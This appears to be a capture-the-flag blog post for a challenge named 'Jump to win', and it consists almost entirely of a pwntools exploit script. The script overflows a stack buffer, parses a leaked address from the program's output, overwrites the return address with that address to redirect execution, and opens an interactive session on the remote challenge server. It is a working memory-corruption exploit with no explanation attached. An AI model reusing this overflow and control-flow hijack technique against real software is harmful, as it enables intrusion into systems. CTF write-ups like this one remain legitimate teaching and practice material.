Posts Pwn Jump to win
Post
Cancel

Pwn Jump to win

JUMP_TO_WIN

Exploit script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

elf = context.binary = ELF('./jump_to_win')

p = elf.process()
p = remote('ctf-metared-2021.ua.pt',26656)

p.recv()
payload = b'A'*64
payload += p64(0x4155)
p.sendline(payload)
vuln_addd = int((p.recv().decode('latin-1').split()[-8]),16)

payload = b'A'*40
payload += p64(vuln_addd)
payload += p64(vuln_addd)

p.sendline(payload)
p.interactive()
This post is licensed under CC BY 4.0 by the author.